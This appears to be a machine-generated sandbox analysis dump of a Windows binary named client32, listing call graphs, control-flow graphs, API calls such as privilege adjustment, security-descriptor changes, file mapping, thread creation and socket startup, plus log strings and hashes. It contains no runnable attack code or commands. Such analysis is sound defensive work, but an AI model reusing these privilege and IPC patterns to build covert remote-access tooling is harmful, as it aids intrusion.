72621 11163aa5 _free 66 API calls 72619->72621 72622 1105ee85 72620->72622 72623 1105ee49 EnterCriticalSection 72620->72623 72621->72620 72622->72572 72623->72572 72624->72573 72625->72575 72627 110611ee 72626->72627 72628 11061208 72626->72628 72650 110608e0 72627->72650 72628->72580 72632 11145bc0 72628->72632 72630 11061200 72658 110610f0 72630->72658 72699 111434c0 72632->72699 72638 11081e7d 72637->72638 72639 11081e82 72637->72639 72706 11081c50 IsDBCSLeadByte 72638->72706 72641 11081e8b 72639->72641 72645 11081e9f 72639->72645 72707 1116558e 85 API calls 2 library calls 72641->72707 72643 11081e98 72643->72588 72644 11081f03 72644->72588 72645->72644 72646 11166654 85 API calls std::_Mutex::_Mutex 72645->72646 72646->72645 72651 110608f4 72650->72651 72657 1106092c 72650->72657 72652 110608f8 72651->72652 72651->72657 72661 110606d0 72652->72661 72653 11060992 72653->72630 72657->72653 72666 11060470 67 API calls 2 library calls 72657->72666 72668 110609a0 72658->72668 72662 1106070e 72661->72662 72665 110606e3 std::ios_base::_Tidy 72661->72665 72662->72630 72663 110606d0 66 API calls 72663->72665 72665->72662 72665->72663 72667 1105fea0 66 API calls 2 library calls 72665->72667 72666->72657 72667->72665 72669 11060a24 72668->72669 72670 110609df 72668->72670 72700 111434d0 72699->72700 72700->72700 72701 11110230 std::_Mutex::_Mutex 265 API calls 72700->72701 72702 111434f8 72701->72702 72705 111433d0 8 API calls 3 library calls 72702->72705 72704 1106151f 72705->72704 72706->72639 72707->72643 72708->72176 72710 11124fd1 InitializeCriticalSection 72709->72710 72712 11124ffe GetCurrentThreadId 72710->72712 72714 11125035 72712->72714 72715 1112503c 72712->72715 72799 1110fff0 InterlockedIncrement 72714->72799 72757 11160b10 InterlockedIncrement 72715->72757 72718 11125051 72755->72185 72758 11160b27 CreateCompatibleDC 72757->72758 72759 11160b22 72757->72759 72760 11160b4c SelectPalette SelectPalette 72758->72760 72761 11160b38 72758->72761 72832 11160a60 
272 API calls std::_Mutex::_Mutex 72759->72832 72834 11160750 265 API calls 72760->72834 72833 11029a70 265 API calls 2 library calls 72761->72833 72766 11160b73 72835 11160750 265 API calls 72766->72835 72768 11160b80 72769 11160b93 72768->72769 72770 11160c4e 72768->72770 72836 111606e0 265 API calls 2 library calls 72769->72836 72847 11160750 265 API calls 72770->72847 72773 11160b9e 72775 11160bc3 72773->72775 72776 11160bad GetSystemPaletteEntries 72773->72776 72774 11160c5b 72777 11160c61 DeleteDC 72774->72777 72778 11160be6 72775->72778 72779 11160bcf 72775->72779 72776->72778 72777->72718 72799->72715 72832->72758 72834->72766 72835->72768 72836->72773 72847->72774 73867->72235 73868->72240 73869 11116880 73887 11145ef0 73869->73887 73872 111168c5 73873 111168a8 73872->73873 73874 111168d4 CoInitialize CoCreateInstance 73872->73874 73875 11162bb7 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 73873->73875 73877 11116904 LoadLibraryA 73874->73877 73880 111168f9 73874->73880 73878 111168b6 73875->73878 73876 11145c70 std::_Mutex::_Mutex 90 API calls 73876->73872 73879 11116920 GetProcAddress 73877->73879 73877->73880 73883 11116930 SHGetSettings 73879->73883 73884 11116944 FreeLibrary 73879->73884 73881 111169e1 CoUninitialize 73880->73881 73882 111169e7 73880->73882 73881->73882 73885 11162bb7 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 73882->73885 73883->73884 73884->73880 73886 111169f6 73885->73886 73888 11145c70 std::_Mutex::_Mutex 90 API calls 73887->73888 73889 1111689e 73888->73889 73889->73872 73889->73873 73889->73876 73890 1102ebd0 73891 1102ec13 73890->73891 73892 111101b0 std::_Mutex::_Mutex 265 API calls 73891->73892 73893 1102ec1a 73892->73893 73895 1102ec3a 73893->73895 74951 11143630 73893->74951 73896 11143780 86 API calls 73895->73896 73897 1102ec64 73896->73897 73898 1102ec91 73897->73898 73899 11081e70 86 API calls 73897->73899 73901 11143780 86 API calls 73898->73901 73900 1102ec76 73899->73900 73902 11081e70 86 API 
calls 73900->73902 73903 1102ecba 73901->73903 73902->73898 73904 11163ca7 std::_Mutex::_Mutex 79 API calls 73903->73904 73908 1102ecc7 73903->73908 73904->73908 73905 1102ecf6 73906 1102ed68 73905->73906 73907 1102ed4f GetSystemMetrics 73905->73907 73912 1102ed82 CreateEventA 73906->73912 73907->73906 73909 1102ed5e 73907->73909 73908->73905 73910 11145c70 std::_Mutex::_Mutex 90 API calls 73908->73910 73911 11147060 std::_Mutex::_Mutex 21 API calls 73909->73911 73910->73905 73911->73906 73913 1102ed95 73912->73913 73914 1102eda9 73912->73914 74959 11029a70 265 API calls 2 library calls 73913->74959 73915 111101b0 std::_Mutex::_Mutex 265 API calls 73914->73915 73917 1102edb0 73915->73917 73918 1102edd0 73917->73918 73919 11110de0 426 API calls 73917->73919 73920 111101b0 std::_Mutex::_Mutex 265 API calls 73918->73920 73919->73918 73921 1102ede4 73920->73921 73922 11110de0 426 API calls 73921->73922 73923 1102ee04 73921->73923 73922->73923 73924 111101b0 std::_Mutex::_Mutex 265 API calls 73923->73924 73925 1102ee83 73924->73925 73926 1102eeb3 73925->73926 73927 11061aa0 301 API calls 73925->73927 73928 111101b0 std::_Mutex::_Mutex 265 API calls 73926->73928 73927->73926 73929 1102eecd 73928->73929 73930 1102eef2 FindWindowA 73929->73930 73932 11061710 293 API calls 73929->73932 73933 1102f032 73930->73933 73934 1102ef2b 73930->73934 73932->73930 73935 11061ef0 268 API calls 73933->73935 73934->73933 73937 1102ef43 GetWindowThreadProcessId 73934->73937 73936 1102f044 73935->73936 73938 11061ef0 268 API calls 73936->73938 73939 11147060 std::_Mutex::_Mutex 21 API calls 73937->73939 73940 1102f050 73938->73940 73941 1102ef60 OpenProcess 73939->73941 73942 11061ef0 268 API calls 73940->73942 73941->73933 73943 1102ef7d 73941->73943 73944 1102f05c 73942->73944 74960 11094f00 105 API calls 73943->74960 73945 1102f073 73944->73945 73946 1102f06a 73944->73946 74314 111464e0 73945->74314 74961 11028360 119 API calls 2 library calls 73946->74961 73949 1102ef9c 73952 11147060 
std::_Mutex::_Mutex 21 API calls 73949->73952 73950 1102f06f 73950->73945 73954 1102efb0 73952->73954 73953 1102f082 73955 1102f086 73953->73955 74329 1102a6d0 IsJPIK 73953->74329 73956 1102efef CloseHandle FindWindowA 73954->73956 73960 11147060 std::_Mutex::_Mutex 21 API calls 73954->73960 74345 11145990 ExpandEnvironmentStringsA 73955->74345 73957 1102f022 73956->73957 73958 1102f014 GetWindowThreadProcessId 73956->73958 73962 11147060 std::_Mutex::_Mutex 21 API calls 73957->73962 73958->73957 73961 1102efc2 SendMessageA WaitForSingleObject 73960->73961 73961->73956 73964 1102efe2 73961->73964 73965 1102f02f 73962->73965 73967 11147060 std::_Mutex::_Mutex 21 API calls 73964->73967 73965->73933 73970 1102efec 73967->73970 73969 1102f0b5 73971 1102f177 73969->73971 74369 11063880 73969->74369 73970->73956 74384 11027b20 73971->74384 73975 110b7df0 std::_Mutex::_Mutex 9 API calls 73976 1102f0e3 73975->73976 73977 11147060 std::_Mutex::_Mutex 21 API calls 73976->73977 73978 1102f19c std::_Mutex::_Mutex 73990 1102f1b7 73978->73990 74404 1102ad70 73978->74404 73986 1102ad70 std::_Mutex::_Mutex 145 API calls 73986->73990 74407 110287a0 73990->74407 75029 111457a0 74314->75029 74317 111457a0 std::_Mutex::_Mutex 265 API calls 74318 11146517 wsprintfA 74317->74318 74319 11143e00 std::_Mutex::_Mutex 8 API calls 74318->74319 74321 11146534 74319->74321 74320 11146560 74322 11162bb7 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 74320->74322 74321->74320 74323 11143e00 std::_Mutex::_Mutex 8 API calls 74321->74323 74324 1114656c 74322->74324 74325 11146549 74323->74325 74324->73953 74325->74320 74326 11146550 74325->74326 74327 11162bb7 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 74326->74327 74328 1114655c 74327->74328 74328->73953 74330 1102a705 74329->74330 74331 1102a7d3 74329->74331 74332 111101b0 std::_Mutex::_Mutex 265 API calls 74330->74332 74331->73955 74333 1102a70c 74332->74333 74334 1102a73b 74333->74334 74335 11061aa0 301 API calls 74333->74335 
74336 11063880 330 API calls 74334->74336 74335->74334 74337 1102a759 74336->74337 74337->74331 74338 110d1930 268 API calls 74337->74338 74340 1102a765 74338->74340 74339 1102a7c7 74341 110d0a10 265 API calls 74339->74341 74340->74339 74342 1102a798 74340->74342 74341->74331 74343 110d0a10 265 API calls 74342->74343 74344 1102a7a4 74343->74344 74344->73955 74346 111459c7 74345->74346 74347 111459d4 74346->74347 74348 111459e4 std::_Mutex::_Mutex 74346->74348 74349 111459fe 74346->74349 74351 11142e60 std::_Mutex::_Mutex 265 API calls 74347->74351 74352 111459f5 GetModuleFileNameA 74348->74352 74350 111457a0 std::_Mutex::_Mutex 265 API calls 74349->74350 74354 11145a04 74350->74354 74353 11145a58 74351->74353 74352->74354 74355 11162bb7 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 74353->74355 74356 11081e00 std::_Mutex::_Mutex IsDBCSLeadByte 74354->74356 74357 1102f0a3 74355->74357 74356->74347 74358 11143e00 74357->74358 74359 11143e21 CreateFileA 74358->74359 74361 11143ebe CloseHandle 74359->74361 74362 11143e9e 74359->74362 74365 11162bb7 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 74361->74365 74363 11143ea2 CreateFileA 74362->74363 74364 11143edb 74362->74364 74363->74361 74363->74364 74367 11162bb7 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 74364->74367 74366 11143ed7 74365->74366 74366->73969 74368 11143eea 74367->74368 74368->73969 74370 1105e820 79 API calls 74369->74370 74371 110638a8 74370->74371 75073 110627b0 74371->75073 74373 1102f0d6 74373->73971 74373->73975 74375 1105e950 5 API calls 74376 11063909 std::_Mutex::_Mutex 74375->74376 74377 1105e820 79 API calls 74376->74377 74378 1106393d 74377->74378 74379 1106395c 74378->74379 74382 1105e950 5 API calls 74378->74382 74382->74379 74385 11061a70 274 API calls 74384->74385 74386 11027b54 74385->74386 74387 1105e820 79 API calls 74386->74387 74388 11027b69 74387->74388 74389 11027bbf LoadIconA 74388->74389 74390 11145ef0 std::_Mutex::_Mutex 90 API calls 74388->74390 
77774->77767 77775 1116c982 77774->77775 77850 1116c548 66 API calls 4 library calls 77775->77850 77777 1116c98a GetCurrentThreadId 77777->77760 77779 1116a3bc 77778->77779 77781 11177e70 77778->77781 77791 11172029 GetStartupInfoW 77779->77791 77780 11177e85 WideCharToMultiByte 77782 11177ea5 77780->77782 77783 11177edd FreeEnvironmentStringsW 77780->77783 77781->77780 77781->77781 77784 1116ac39 __malloc_crt 66 API calls 77782->77784 77783->77779 77785 11177eab 77784->77785 77785->77783 77786 11177eb3 WideCharToMultiByte 77785->77786 77787 11177ec5 77786->77787 77788 11177ed1 FreeEnvironmentStringsW 77786->77788 77789 11163aa5 _free 66 API calls 77787->77789 77788->77779 77790 11177ecd 77789->77790 77790->77788 77792 1116ac7e __calloc_crt 66 API calls 77791->77792 77793 11172047 77792->77793 77795 1116ac7e __calloc_crt 66 API calls 77793->77795 77797 1117213c 77793->77797 77798 1116a3c6 77793->77798 77800 111721bc 77793->77800 77794 111721f2 GetStdHandle 77794->77800 77795->77793 77796 11172256 SetHandleCount 77796->77798 77797->77800 77801 11172173 InitializeCriticalSectionAndSpinCount 77797->77801 77802 11172168 GetFileType 77797->77802 77798->77734 77804 11177d99 77798->77804 77799 11172204 GetFileType 77799->77800 77800->77794 77800->77796 77800->77799 77803 1117222a InitializeCriticalSectionAndSpinCount 77800->77803 77801->77797 77801->77798 77802->77797 77802->77801 77803->77798 77803->77800 77805 11177db3 GetModuleFileNameA 77804->77805 77806 11177dae 77804->77806 77808 11177dda 77805->77808 77858 11171a45 94 API calls __setmbcp 77806->77858 77852 11177bff 77808->77852 77811 1116ac39 __malloc_crt 66 API calls 77812 11177e1c 77811->77812 77813 11177bff _parse_cmdline 76 API calls 77812->77813 77814 1116a3d6 77812->77814 77813->77814 77814->77738 77815 11177b23 77814->77815 77816 11177b2c 77815->77816 77820 11177b31 _strlen 77815->77820 77860 11171a45 94 API calls __setmbcp 77816->77860 77818 1116a3df 77818->77738 77831 1116e46e 77818->77831 77819 1116ac7e 
__calloc_crt 66 API calls 77827 11177b66 _strlen 77819->77827 77820->77818 77820->77819 77821 11177bb5 77822 11163aa5 _free 66 API calls 77821->77822 77822->77818 77823 1116ac7e __calloc_crt 66 API calls 77823->77827 77824 11177bdb 77825 11163aa5 _free 66 API calls 77824->77825 77825->77818 77826 1116cd5f _strcpy_s 66 API calls 77826->77827 77827->77818 77827->77821 77827->77823 77827->77824 77827->77826 77828 11177bf2 77827->77828 77829 1116ed72 __invoke_watson 10 API calls 77828->77829 77830 11177bfe 77829->77830 77832 1116e47c __IsNonwritableInCurrentImage 77831->77832 77861 1116d88b EncodePointer 77832->77861 77834 1116e49a __initterm_e 77836 1116e4bb __IsNonwritableInCurrentImage 77834->77836 77862 11163dd5 76 API calls __cinit 77834->77862 77836->77738 77837->77711 77838->77716 77839->77734 77840->77708 77841->77717 77842->77721 77843->77709 77844->77711 77845->77733 77846->77711 77847->77759 77848->77764 77849->77766 77850->77777 77851->77760 77854 11177c1e 77852->77854 77856 11177c8b 77854->77856 77859 11177590 76 API calls x_ismbbtype_l 77854->77859 77855 11177d89 77855->77811 77855->77814 77856->77855 77857 11177590 76 API calls _parse_cmdline 77856->77857 77857->77856 77858->77805 77859->77854 77860->77820 77861->77834 77862->77836 77864 11110474 EnterCriticalSection 77863->77864 77865 1111045f InitializeCriticalSection 77863->77865 77866 11110495 77864->77866 77865->77864 77867 111104c3 LeaveCriticalSection 77866->77867 77868 111103d0 ___DllMainCRTStartup 4 API calls 77866->77868 77867->77750 77868->77866 77869 11030b78 77870 11143630 267 API calls 77869->77870 77871 11030b86 77870->77871 77872 11143780 86 API calls 77871->77872 77873 11030bc3 77872->77873 77874 11030bd8 77873->77874 77875 11081e70 86 API calls 77873->77875 77876 110ed520 8 API calls 77874->77876 77875->77874 77877 11030bff 77876->77877 77887 11030c49 77877->77887 77937 110ed5d0 81 API calls 2 library calls 77877->77937 77879 11030c14 77938 110ed5d0 81 API calls 2 library calls 
77879->77938 77881 11143780 86 API calls 77883 11030c60 77881->77883 77882 11030c2b 77885 11146fe0 19 API calls 77882->77885 77882->77887 77884 111101b0 std::_Mutex::_Mutex 265 API calls 77883->77884 77886 11030c6f 77884->77886 77885->77887 77888 11030c90 77886->77888 77889 11088b30 268 API calls 77886->77889 77887->77881 77890 1108a880 267 API calls 77888->77890 77889->77888 77891 11030ca3 OpenMutexA 77890->77891 77892 11030cc3 CreateMutexA 77891->77892 77893 11030dda CloseHandle 77891->77893 77894 11030ce3 77892->77894 77930 1108a980 77893->77930 77896 111101b0 std::_Mutex::_Mutex 265 API calls 77894->77896 77898 11030cf8 77896->77898 77897 11030df0 77901 11162bb7 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 77897->77901 77899 11030d1b 77898->77899 77900 11061710 293 API calls 77898->77900 77920 110161e0 LoadLibraryA 77899->77920 77900->77899 77902 11031773 77901->77902 77904 11030d2d 77905 11145c70 std::_Mutex::_Mutex 90 API calls 77904->77905 77906 11030d3c 77905->77906 77907 11030d49 77906->77907 77908 11030d5c 77906->77908 77921 111466b0 77907->77921 77910 11030d66 GetProcAddress 77908->77910 77911 11030d50 77908->77911 77910->77911 77912 11030d80 SetLastError 77910->77912 77913 110287a0 47 API calls 77911->77913 77912->77911 77914 11030d8d 77913->77914 77939 11009370 429 API calls std::_Mutex::_Mutex 77914->77939 77916 11030d9c 77917 11030db0 WaitForSingleObject 77916->77917 77917->77917 77918 11030dc2 CloseHandle 77917->77918 77918->77893 77919 11030dd3 FreeLibrary 77918->77919 77919->77893 77920->77904 77922 11145c70 std::_Mutex::_Mutex 90 API calls 77921->77922 77923 111466c2 77922->77923 77924 11146700 77923->77924 77925 111466c9 LoadLibraryA 77923->77925 77924->77911 77926 111466fa 77925->77926 77927 111466db GetProcAddress 77925->77927 77926->77911 77928 111466f3 FreeLibrary 77927->77928 77929 111466eb 77927->77929 77928->77926 77929->77928 77931 1108aa27 77930->77931 77935 1108a9ba std::ios_base::_Tidy 77930->77935 77932 1108aa2e 
DeleteCriticalSection 77931->77932 77940 1115c2d0 77932->77940 77933 1108a9ce CloseHandle 77933->77935 77935->77931 77935->77933 77936 1108aa54 std::ios_base::_Tidy 77936->77897 77937->77879 77938->77882 77939->77916 77943 1115c2e4 77940->77943 77941 1115c2e8 77941->77936 77943->77941 77944 1115c040 67 API calls 2 library calls 77943->77944 77944->77943

Control-flow Graph

                                                                                                                                                    control_flow_graph 774 1109e5b0-1109e612 call 1109dda0 777 1109e618-1109e63b call 1109d860 774->777 778 1109ec30 774->778 784 1109e641-1109e655 LocalAlloc 777->784 785 1109e7a4-1109e7a6 777->785 780 1109ec32-1109ec4d call 11162bb7 778->780 786 1109e65b-1109e68d InitializeSecurityDescriptor SetSecurityDescriptorDacl GetVersionExA 784->786 787 1109ec25-1109ec2b call 1109d8f0 784->787 788 1109e736-1109e75b CreateFileMappingA 785->788 791 1109e71a-1109e730 786->791 792 1109e693-1109e6be call 1109d7d0 call 1109d810 786->792 787->778 789 1109e7a8-1109e7bb GetLastError 788->789 790 1109e75d-1109e77d GetLastError call 110d6c20 788->790 796 1109e7bd 789->796 797 1109e7c2-1109e7d9 MapViewOfFile 789->797 805 1109e788-1109e790 790->805 806 1109e77f-1109e786 LocalFree 790->806 791->788 823 1109e709-1109e711 792->823 824 1109e6c0-1109e6f6 GetSecurityDescriptorSacl 792->824 796->797 798 1109e7db-1109e7f6 call 110d6c20 797->798 799 1109e817-1109e81f 797->799 817 1109e7f8-1109e7f9 LocalFree 798->817 818 1109e7fb-1109e803 798->818 803 1109e8c1-1109e8d3 799->803 804 1109e825-1109e83e GetModuleFileNameA 799->804 809 1109e919-1109e932 call 11162be0 GetTickCount 803->809 810 1109e8d5-1109e8d8 803->810 811 1109e8dd-1109e8f8 call 110d6c20 804->811 812 1109e844-1109e84d 804->812 813 1109e792-1109e793 LocalFree 805->813 814 1109e795-1109e79f 805->814 806->805 835 1109e934-1109e939 809->835 819 1109e9bf-1109ea23 GetCurrentProcessId GetModuleFileNameA call 1109dc30 810->819 839 1109e8fa-1109e8fb LocalFree 811->839 840 1109e8fd-1109e905 811->840 812->811 820 1109e853-1109e856 812->820 813->814 822 1109ec1e-1109ec20 call 1109dce0 814->822 817->818 828 1109e808-1109e812 818->828 829 1109e805-1109e806 LocalFree 818->829 844 1109ea2b-1109ea42 CreateEventA 819->844 845 1109ea25 819->845 831 1109e899-1109e8bc call 110d6c20 call 1109dce0 820->831 832 
1109e858-1109e85c 820->832 822->787 823->791 826 1109e713-1109e714 FreeLibrary 823->826 824->823 825 1109e6f8-1109e703 SetSecurityDescriptorSacl 824->825 825->823 826->791 828->822 829->828 831->803 832->831 838 1109e85e-1109e869 832->838 841 1109e93b-1109e94a 835->841 842 1109e94c 835->842 846 1109e870-1109e874 838->846 839->840 847 1109e90a-1109e914 840->847 848 1109e907-1109e908 LocalFree 840->848 841->835 841->842 849 1109e94e-1109e954 842->849 853 1109ea44-1109ea63 GetLastError * 2 call 110d6c20 844->853 854 1109ea66-1109ea6e 844->854 845->844 851 1109e890-1109e892 846->851 852 1109e876-1109e878 846->852 847->822 848->847 859 1109e965-1109e9bd 849->859 860 1109e956-1109e963 849->860 856 1109e895-1109e897 851->856 861 1109e87a-1109e880 852->861 862 1109e88c-1109e88e 852->862 853->854 857 1109ea70 854->857 858 1109ea76-1109ea87 CreateEventA 854->858 856->811 856->831 857->858 865 1109ea89-1109eaa8 GetLastError * 2 call 110d6c20 858->865 866 1109eaab-1109eab3 858->866 859->819 860->849 860->859 861->851 863 1109e882-1109e88a 861->863 862->856 863->846 863->862 865->866 868 1109eabb-1109eacd CreateEventA 866->868 869 1109eab5 866->869 871 1109eacf-1109eaee GetLastError * 2 call 110d6c20 868->871 872 1109eaf1-1109eaf9 868->872 869->868 871->872 874 1109eafb 872->874 875 1109eb01-1109eb12 CreateEventA 872->875 874->875 876 1109eb34-1109eb42 875->876 877 1109eb14-1109eb31 GetLastError * 2 call 110d6c20 875->877 880 1109eb44-1109eb45 LocalFree 876->880 881 1109eb47-1109eb4f 876->881 877->876 880->881 883 1109eb51-1109eb52 LocalFree 881->883 884 1109eb54-1109eb5d 881->884 883->884 885 1109eb63-1109eb66 884->885 886 1109ec07-1109ec19 call 110d6c20 884->886 885->886 888 1109eb6c-1109eb6f 885->888 886->822 888->886 890 1109eb75-1109eb78 888->890 890->886 891 1109eb7e-1109eb81 890->891 892 1109eb8c-1109eba8 CreateThread 891->892 893 1109eb83-1109eb89 GetCurrentThreadId 891->893 894 1109ebaa-1109ebb4 892->894 895 1109ebb6-1109ebc0 892->895 893->892 894->822 896 
1109ebda-1109ec05 SetEvent call 110d6c20 call 1109d8f0 895->896 897 1109ebc2-1109ebd8 ResetEvent * 3 895->897 896->780 897->896
APIs
  • Part of subcall function 1109D860: GetCurrentProcess.KERNEL32(000F01FF,?,11030703,00000000,00000000,00080000,1EF76653,00080000,00000000,?), ref: 1109D88D
  • Part of subcall function 1109D860: OpenProcessToken.ADVAPI32(00000000), ref: 1109D894
  • Part of subcall function 1109D860: LookupPrivilegeValueA.ADVAPI32(00000000,00000000,?), ref: 1109D8A5
  • Part of subcall function 1109D860: AdjustTokenPrivileges.KERNELBASE(00000000), ref: 1109D8C9
• LocalAlloc.KERNEL32(00000040,00000014,SeSecurityPrivilege,?,00080000,1EF76653,00080000,00000000,?), ref: 1109E645
• InitializeSecurityDescriptor.ADVAPI32(00000000,00000001), ref: 1109E65E
• SetSecurityDescriptorDacl.ADVAPI32(00000000,00000001,00000000,00000000), ref: 1109E669
• GetVersionExA.KERNEL32(?), ref: 1109E680
• GetSecurityDescriptorSacl.ADVAPI32(?,?,?,?,S:(ML;;NW;;;LW),00000001,?,00000000), ref: 1109E6EE
• SetSecurityDescriptorSacl.ADVAPI32(00000000,00000001,?,00000000), ref: 1109E703
• FreeLibrary.KERNEL32(00000001,S:(ML;;NW;;;LW),00000001,?,00000000), ref: 1109E714
• CreateFileMappingA.KERNEL32(000000FF,11030703,00000004,00000000,?,?), ref: 1109E750
• GetLastError.KERNEL32 ref: 1109E75D
• LocalFree.KERNEL32(?), ref: 1109E786
• LocalFree.KERNEL32(?), ref: 1109E793
• GetLastError.KERNEL32 ref: 1109E7B0
• MapViewOfFile.KERNEL32(?,000F001F,00000000,00000000,00000000), ref: 1109E7CE
• LocalFree.KERNEL32(?), ref: 1109E7F9
• LocalFree.KERNEL32(?), ref: 1109E806
  • Part of subcall function 1109D7D0: LoadLibraryA.KERNEL32(Advapi32.dll,00000000,1109E69E), ref: 1109D7D8
  • Part of subcall function 1109D810: GetProcAddress.KERNEL32(00000000,ConvertStringSecurityDescriptorToSecurityDescriptorA), ref: 1109D824
• GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 1109E832
• LocalFree.KERNEL32(?), ref: 1109E8FB
• LocalFree.KERNEL32(?), ref: 1109E908
• _memset.LIBCMT ref: 1109E920
• GetTickCount.KERNEL32 ref: 1109E928
• GetCurrentProcessId.KERNEL32 ref: 1109E9D4
• GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 1109E9EF
• CreateEventA.KERNEL32(?,00000000,00000000,?,?,?,?,?,?), ref: 1109EA3B
• GetLastError.KERNEL32 ref: 1109EA44
• GetLastError.KERNEL32(00000000), ref: 1109EA4B
• CreateEventA.KERNEL32(?,00000000,00000000,?), ref: 1109EA80
• GetLastError.KERNEL32 ref: 1109EA89
• GetLastError.KERNEL32(00000000), ref: 1109EA90
• CreateEventA.KERNEL32(?,00000001,00000000,?), ref: 1109EAC6
• GetLastError.KERNEL32 ref: 1109EACF
• GetLastError.KERNEL32(00000000), ref: 1109EAD6
• CreateEventA.KERNEL32(?,00000000,00000000,?), ref: 1109EB0B
• GetLastError.KERNEL32 ref: 1109EB1A
• GetLastError.KERNEL32(00000000), ref: 1109EB1D
• LocalFree.KERNEL32(?), ref: 1109EB45
• LocalFree.KERNEL32(?), ref: 1109EB52
• GetCurrentThreadId.KERNEL32 ref: 1109EB83
• CreateThread.KERNEL32(00000000,00002000,Function_0009E140,00000000,00000000,00000030), ref: 1109EB9D
• ResetEvent.KERNEL32(?), ref: 1109EBCC
• ResetEvent.KERNEL32(?), ref: 1109EBD2
• ResetEvent.KERNEL32(?), ref: 1109EBD8
• SetEvent.KERNEL32(?), ref: 1109EBDE
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
• Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: ErrorLast$FreeLocal$Event$Create$DescriptorFileSecurity$CurrentProcessReset$LibraryModuleNameSaclThreadToken$AddressAdjustAllocCountDaclInitializeLoadLookupMappingOpenPrivilegePrivilegesProcTickValueVersionView_memset
• String ID: Cant create event %s, e=%d (x%x)$Error cant create events$Error cant map view$Error creating filemap (%d)$Error filemap exists$IPC(%s) created$Info - reusing existing filemap$S:(ML;;NW;;;LW)$SeSecurityPrivilege$cant create events$cant create filemap$cant create thread$cant map$map exists$warning map exists
• API String ID: 3291243470-2792520954
• Opcode ID: 5f128e5d137d7e61479c73dee0859362bd36eaaf37b2cb873371865b9cdea2a1
• Instruction ID: a3fd055aacadca8d823d44ca49761fd5d24e706f53ed4dbc48f97bf713fa71f6
• Opcode Fuzzy Hash: 5f128e5d137d7e61479c73dee0859362bd36eaaf37b2cb873371865b9cdea2a1
• Instruction Fuzzy Hash: A612B2B5E0026D9FEB24DF60CDD4EAAB7BAFB88304F0049A9E51D97640D671AD84CF50

Control-flow Graph

                                                                                                                                                    control_flow_graph 902 6ca97030-6ca97050 call 6ca82a90 call 6ca9dbd0 907 6ca97052-6ca97095 LoadLibraryA 902->907 908 6ca97097 902->908 909 6ca97099-6ca970f8 call 6ca88d00 InitializeCriticalSection CreateEventA 907->909 908->909 912 6ca970fa-6ca9710e call 6ca86f50 909->912 913 6ca97111-6ca9711e CreateEventA 909->913 912->913 915 6ca97120-6ca97134 call 6ca86f50 913->915 916 6ca97137-6ca97144 CreateEventA 913->916 915->916 919 6ca9715d-6ca97170 WSAStartup 916->919 920 6ca97146-6ca9715a call 6ca86f50 916->920 921 6ca97183-6ca971b2 call 6caa1b69 919->921 922 6ca97172-6ca97182 call 6ca85290 call 6ca82b70 919->922 920->919 931 6ca971d0-6ca971e4 _memset 921->931 932 6ca971b4-6ca971cd call 6ca86f50 921->932 935 6ca971fa-6ca97202 931->935 936 6ca971e6-6ca971e9 931->936 932->931 937 6ca97209-6ca97223 call 6caa3753 935->937 938 6ca97204 935->938 936->935 940 6ca971eb-6ca971f1 936->940 944 6ca9723c-6ca97255 call 6ca99bf0 937->944 945 6ca97225-6ca97239 call 6ca86f50 937->945 938->937 940->935 942 6ca971f3-6ca971f8 940->942 942->937 950 6ca9726a-6ca97271 call 6ca85730 944->950 951 6ca97257-6ca9725e 944->951 945->944 955 6ca9730b-6ca97310 950->955 956 6ca97277-6ca9729a call 6caa1b69 950->956 952 6ca97260-6ca97268 951->952 952->950 952->952 958 6ca9731e-6ca97336 call 6ca85e90 call 6ca85530 955->958 959 6ca97312-6ca97315 955->959 964 6ca9729c-6ca972bb call 6ca86f50 956->964 965 6ca972be-6ca972dc _memset call 6caa1b69 956->965 963 6ca97339-6ca97354 call 6ca85e90 958->963 959->958 962 6ca97317-6ca9731c 959->962 962->958 962->963 977 6ca97361-6ca9738b GetTickCount CreateThread 963->977 978 6ca97356-6ca9735c 963->978 964->965 975 6ca972fa-6ca97308 _memset 965->975 976 6ca972de-6ca972f7 call 6ca86f50 965->976 975->955 976->975 980 6ca973a9-6ca973b6 SetThreadPriority 977->980 981 6ca9738d-6ca973a6 call 6ca86f50 977->981 978->977 984 
